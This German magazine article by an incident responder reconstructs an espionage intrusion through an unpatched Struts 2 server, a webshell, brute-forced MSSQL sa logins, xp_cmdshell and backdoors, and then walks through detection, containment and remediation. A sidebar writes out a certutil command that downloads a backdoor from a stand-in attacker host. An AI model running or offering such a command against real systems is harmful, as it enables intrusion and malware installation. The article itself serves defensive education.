"The breach is inevitable"

Auf den Spuren des Angreifers: Das Protokoll einer Cyberattacke

Mathias Fuchs

© Shutterstock.com/MatiasDelCarmine
© RoseRodionova
© S&S Media

Ein warmer Sommertag, es ist gerade Mittag in Shanghai. In einem dunklen Raum in einem unauffälligen Gebäude sitzt ein Hacker und durchforstet das Netzwerk eines Konzerns, der eine sechsstellige Zahl an Endpunkten betreibt. Die Ziele hat der Angreifer von „oben“ erhalten, es ist nicht sein einziges „Projekt“, an dem er gerade arbeitet, aber sein delikatestes. Schauen wir uns das Protokoll eines Cyberangriffs auf einen internationalen Großkonzern vom initialen Einbruch über eine bereits damals bekannte Struts-2-Lücke bis zur Entfernung des Angreifers aus dem Unternehmensnetz an.

„The breach is inevitable – Ein Sicherheitsvorfall ist unvermeidbar“, ist ein geeigneter Satz, um die aktuelle Situation der IT-Sicherheit zu beschreiben. Lapidar zusammengefasst kann man davon ausgehen, dass jedes Unternehmen, das marktfähig ist, auch über Informationen verfügt, die interessant für Dritte sind. In logischer Konsequenz steht damit auch jedes Unternehmen im Fadenkreuz von Cyberkriminellen und ausgeklügelten Angriffen.

Jahrelang lag der Hauptfokus im Bereich IT-Security auf Protect, also darauf, die eigenen Assets zu beschützen und Sicherheitsvorfälle zu verhindern. Ein vollständiger Schutz ist in Anbetracht der heutigen IT-Nutzung unrealistisch, wodurch vor einigen Jahren ein Paradigmenwechsel von Protect zu Detect begonnen hat. Auch wenn sich nach wie vor viele Unternehmen erst in einer Umbauphase befinden, wird immer klarer, dass die Frage nicht mehr die ist, ob es einen Sicherheitsvorfall gibt, sondern wann. Wie groß der Schaden für die Angriffsopfer ist, ergibt sich meist aus der Zeit zwischen initialem Einbruch und dessen Entdeckung und Bereinigung. Nach aktuellen Untersuchungen verschiedener Unternehmen dauert das immer noch wesentlich länger als die Zeit, die Angreifer benötigen, um signifikant Schaden zu verursachen.

Üblicherweise verlaufen Angriffe in verschiedenen Phasen, die die von Lockheed Martin postulierte Cyber Kill Chain beschreibt. Kurz zusammengefasst deckt die Cyber Kill Chain alle Schritte von der Aufklärung vor dem Angriff (Reconnaissance) bis zur Exfiltration von Daten aus dem Zielnetzwerk (Actions on Objectives) ab.

From China with love – der Angriffsvektor

Im hier beschriebenen Fall handelte es sich höchstwahrscheinlich um eine chinesische Hackergruppe, weil sehr spezielle Backdoors eingesetzt wurden (z. B. PlugX/SOGU). Selbstverständlich ist China nicht die einzige Nation, die auf militärischem Level Hacker einsetzt, um ihre Ziele zu erreichen, aber eine der aktiveren. Gut trainierte Angreifergruppen zeichnen sich unter anderem dadurch aus, dass sie sich perfekt auf Angriffe vorbereiten. Dabei ist es nicht unüblich, dass die vorbereitenden Phasen wie Reconnaissance und Weaponization Wochen oder sogar Monate in Anspruch nehmen. Das resultiert dann darin, dass die Angreifer tendenziell die Netze der Opfer wesentlich besser kennen als die Betreiber selbst. Auch in diesem Fall verzichtete der Angreifer darauf, die gut geschützte Eingangstür aufzubrechen, vielmehr entdeckte er eine Seitentür, die dem Betreiber des Netzes zum Zeitpunkt des Angriffs wohl nicht bekannt war.

Beim Ziel handelt es sich um ein gut bekanntes, weltweit tätiges Industrieunternehmen. Bei diesen Unternehmen stehen regelmäßig Fusionen und Akquisitionen (M & A) an. Typischerweise sind IT-Abteilungen eher chancenlos, so schnell auf Veränderungen der Unternehmensstruktur zu reagieren und hinken stetig hinterher. Da nun aber selbst die Sicherheitsnormen ISO 2700x vorsehen, dass Sicherheitsmaßnahmen das Brot-und-Buttergeschäft des Geschäftsbetriebs nicht negativ beeinflussen dürfen, ist es auch klar, dass nicht immer alle Netzstrukturen und jede entwickelte Software unmittelbar nach allen Regeln der Sicherheit aufgebaut werden. Das Opfer hatte einige Monate zuvor ein anderes Unternehmen zugekauft. Um einer reibungslosen Integration nicht im Weg zu stehen, wurden die Netze beider Unternehmen flach verbunden und Firewallregeln sehr freizügig gehandhabt. Während das Opfer saubere DMZ-Strukturen und ein ausgereiftes Internetaccesskonzept umgesetzt hatte, war beim zugekauften Unternehmen die Situation anders. Es gab zwar eine Demilitarisierte Zone (DMZ), an die einige im Internet verfügbare Server angebunden waren, die Trennung vom restlichen Netz war aber eher rudimentär. Während nahezu alle Server und Clients im Netzwerk des Opferunternehmens zentral verwaltet und überwacht wurden, waren die Server und Clients im zugekauften Unternehmen eben nur auf Netzwerkebene an das Mutterunternehmen angebunden, wurden aber mehrheitlich nicht von dort verwaltet.

Lesen Sie auch: Quantenkryptografie: Datenverschlüsselung im Postquantenzeitalter

An besagtem Sonntag war es dann Zeit für die Angreifer zuzuschlagen und von der eben beschriebenen Netzstruktur zu profitieren. In der schlecht geschützten DMZ des zugekauften Unternehmens betrieb ein Server eine wenig genutzte Webapplikation für Kunden auf Basis des Struts-2-Frameworks. Die eingesetzte Software war schon länger nicht mehr aktualisiert worden und der Server noch nicht oder nicht richtig in das Schwachstellenmanagement des Unternehmens eingebunden. Dem Angreifer war es also möglich, eine ungepatchte Lücke im Framework auszunutzen, um seinen eigenen Code in Form einer Webshell hochzuladen. Diese Webshell war sehr einfach aufgebaut, ihre einzige Fähigkeit lag darin, Class-C-Netzwerke nach offenen Microsoft-SQL-Server-Ports (1433/TCP) zu scannen. Wurde erst einmal ein MSSQL-Server gefunden, wurden einige fest codierte Passwörter (leeres Passwort, „Password123“ …) für den Administratoruser (sa) ausprobiert. War ein Log-in erfolgreich, erhielt der Angreifer eine Rückmeldung und nutzte xp_cmdshell, um eine Backdoor auf die Server hochzuladen und auszuführen (Kasten: „Certutil“). Alle weiteren Schritte erfolgten dann über den komplex verschlüsselten Kanal der Backdoor, die auch proxyfähig war und damit problemlos einen Internetzugang herstellen konnte.

Certutil
Eine der Aufgaben, die Angreifer meist irgendwann im Zuge des Angriffs erfüllen müssen, ist es, Dateien möglichst nur durch Einsatz von Windows-Bordmitteln herunterzuladen. Häufig wird dazu PowerShell verwendet. Ein anderer, wesentlich unbekannterer und damit gefährlicherer Weg ist es, beliebige Dateien mittels certutil.exe herunterzuladen. Eigentlich stellt Microsoft Windows dieses Werkzeug zur Verfügung, um Informationen über Zertifikate und CAs anzuzeigen. Mit folgendem Befehl kann damit aber auch eine beliebige Datei heruntergeladen werden:
certutil.exe -urlcache -split -f http://attacker.com/backdoor.tmp backdoor.exe

Jeder macht Fehler, auch Angreifer – die Entdeckung

Im Laufe von zwei Wochen erkundete der Angreifer einige Netzwerke der Klasse C und infizierte dabei rund zehn Server, die SQL-Server mit schwachen Administratorpasswörtern zur Verfügung stellten. Die jeweils vom Angreifer installierte Backdoor war damals noch wenig bekannt, und die eingesetzte Malwareunterfamilie wurde sowohl in der Ausführung als auch in der Kommunikation von keinem der eingesetzten Sicherheitsprodukte (AV, Netzwerksensoren, Proxy Monitoring) erkannt. Hätte der Angreifer zu diesem Zeitpunkt keinen Fehler begangen, hätte er sich wohl noch wesentlich länger unentdeckt durch das Netz bewegen können. Aus völlig unersichtlichen Gründen wich der Angreifer aber dann bei einem Server von seiner Standardprozedur ab und installierte statt der neuen, schwer erkennbaren Backdoor eine für chinesische Hackergruppen typische und bereits bekannte Backdoor. Diese wird zwar üblicherweise auch nicht von AV-Produkten erkannt, die Netzwerksignatur der Kommunikation ist aber sehr spezifisch. Zwei Wochen nach dem initialen Angriff erkannte dann das Sicherheitsteam des Opfers die Installation und reagierte. Weder wurde die Verbindung des Angreifers gekappt noch der infizierte Rechner vom Netz genommen. Stattdessen führte man wenig invasiv eine Host Triage auf dem Rechner durch, und schnell stand der Webserver in der DMZ des Tochterunternehmens als Quelle des Angriffs fest. Sofort unternahm das Sicherheitsteam Schritte, um Zugriff auf die Logs dieses Webservers sowie einen Abzug der aktiven Webapplikationen zu bekommen. Anhand der Daten waren dann bereits sehr viele Details des Angriffs bekannt, unter anderem der Arbeitsrhythmus der Angreifer, welche C-Netze bereits gescannt und welche Server kompromittiert wurden.

Der nächste Schritt bestand darin, zu verstehen, warum bei den anderen infizierten Rechnern alle Detektionsmaßnahmen versagt hatten. Schnell klärte sich der Grund: die eher unbekannte Backdoor. Zu diesem Zeitpunkt wurde bereits jegliche Kommunikation der Backdoor aufgezeichnet, die mittlerweile auf mehr als zehn Servern installiert war. Allerdings konnte man sie zu diesem Zeitpunkt noch nicht entschlüsseln. Anhand eines auf einem der Server befindlichen Backdoor-Programms ließ sich schließlich die Verschlüsselung knacken. Ein eilig zusammengebauter Decrypter wurde auf die bereits gespeicherten Verkehrsdaten angewandt. Dadurch konnte das Sicherheitsteam nun beobachten, welche Befehle und Tools der Angreifer auf jedem der Rechner verwendete, und schnell war klar, dass der Angreifer einen Server suchte, der Mitglied der Hauptdomäne des Mutterunternehmens war. Auch von Servern, die anderen Domänen zugeordnet wurden, wurde vom Angreifer standardmäßig eine Memory-only-Variante des bekannten Klartext-Passwort-Dumpers mimikatz ausgeführt. Modernere Virenscanner erkennen auch diese mimikatz-Varianten, aber um das zu verhindern, wurde der eingesetzte Code sehr stark verändert, sodass die Ausführung nicht mehr erkennbar war.

Lesetipp:

Grundkurs Docker: Eine praktische Einführung in die Welt der Container

Keine andere Technologie hat die IT in den letzten Jahren so geprägt wie Docker. Doch warum ist das so? Was macht Docker so besonders, wie funktioniert die Technologie unter der Haube und wie können Sie vom Trend profitieren? In unserem Grundkurs Docker lernen Sie anhand praktischer Beispiele, Docker und die Container-Technologie richtig einzusetzen.

Jetzt gratis auf JAXenter lesen!

It’s getting slower – Containment

An dieser Stelle einer Untersuchung eröffnen sich zwei Möglichkeiten: Entweder man plant und startet unmittelbar eine Remediation, um den Angreifer aus dem Netz zu bekommen, oder man nutzt den Vorteil, den Angreifer erkannt zu haben, um ihn zu beobachten und sogar kontrollieren zu können. Diese Entscheidung ist natürlich immer situationsabhängig und sollte generell von der Annahme getrieben sein, dass der Angreifer auf jeden Fall versuchen wird, zurückzukommen – spätestens dann ist es ein großer Vorteil, den Angreifer besser zu verstehen.

Ist das Sicherheitsteam sicher, alle Kommunikation des Angreifers nahezu in Echtzeit verfolgen zu können, gibt es zumindest zwei Dinge, die helfen, ein Höchstmaß an Wissen über den Angreifer zu generieren. Der erste Schritt ist, das weitere Vorgehen und die Ziele des Angreifers zu verstehen. In diesem Fall scannte der Angreifer weiterhin sequenziell und systembedingt langsam das Klasse-C-Netzwerk nach schlecht gesicherten MSSQL-Servern. Weil das Sicherheitsteam ja zu diesem Zeitpunkt wusste, wo der Angreifer gerade scannte und wo er bald scannen würde, konnte es verfügbare Schwachstellenscanner oder einfach nur NMAP mit einem etwas angepassten mssql-info NSE Script verwenden, um dem Angreifer zuvorzukommen und weitere verwundbare Server zu identifizieren. Gleichzeitig kann man durch eine Anpassung der Webserverkonfiguration oder gegebenenfalls eines Load Balancers gezielt die Antwortzeiten der Webshell verlangsamen (Tarpitting). Das primäre Ziel bei allen Operationen ist natürlich, den Angreifer nicht wissen zu lassen, dass er entdeckt wurde.

Erlangt die Verteidigung die volle Kontrolle über den Angreifer, kann sie zusätzlich versuchen, spezifische Aktionen zu provozieren. Eine Möglichkeit wäre es, eingesetzte Backdoors zu erkennen, um den Einsatz neuer, noch unbekannter Backdoors zu provozieren. Solange die Installation dieser Hintertüren über die überwachten Kanäle erfolgt, wird man davon nicht überrascht und ist noch besser gewappnet für weitere Angriffe.

Lesen Sie auch: Microservices authentifizieren: So entwickelt man Single Sign-on für verteilte Systeme

Das große Aufräumen – Remediation

Irgendwann wird die Kontrolle des Angreifers nicht mehr personell zu rechtfertigen sein oder der Angreifer bemerken, dass er entdeckt wurde. Es ist Zeit, den Angreifer und seine Spuren aus dem Unternehmen zu entfernen. Eine wichtige Basis für eine erfolgreiche Remediation ist immer ein möglichst vollständiges Bild des Einbruchs. Dabei hilft eine lückenlose Dokumentation aller Artefakte, infizierter Hosts, Malware und dergleichen mehr, auf deren Basis dann ein Remediation-Plan erstellt wird, der vorsieht, wann welche Server neu aufzubauen sind, wen man dazu braucht und welche IP-Adressen und Domainnamen gesperrt werden müssen. Einen guten Einblick in professionelle Remediation gibt der Talk von Manfred Erjak.

Lessons Learned

Durch die relativ schnelle Entdeckung des Angriffs ergibt sich ein größerer Handlungsspielraum als wenn der Breach später entdeckt wird, aber die Regel ist dies leider nicht. Dennoch können Sicherheitsverantwortliche ihre Chancen stark erhöhen, indem sie in Detection-Fähigkeiten investieren. Das betrifft vor allem auch den Einsatz von Mitarbeitern, die selbstständig handlungsfähig und in der Untersuchung von komplexen Breaches erfahren sind. Hier richtig zu reagieren und nicht sofort Single Point Remediation zu betreiben, ist eine der wichtigsten Grundvoraussetzungen, denn der Angreifer kommt zurück – meist besser gewappnet als zuvor.

Geschrieben von
Mathias Fuchs
Mathias Fuchs
Mathias Fuchs ist ein SANS Instructor für den Kurs FOR508 Advanced Digital Forensics and Incident Response. Hauptberuflich arbeitet er für die InfoGuard AG als Head of CyberDefence und leitet Teams bei der Jagd nach Cyberbedrohungen an. Die Schwerpunkte seiner Arbeit liegen im Bereich Penetration Testing und Incident Response. Darüber hinaus hält er auf zahlreichen nationalen und internationalen Sicherheitskonferenzen und -kongressen Vorträge zu den Themen Forensik und Incident Response Management.
Kommentare

Hinterlasse einen Kommentar

Hinterlasse den ersten Kommentar!

avatar
400
  Subscribe  
Benachrichtige mich zu: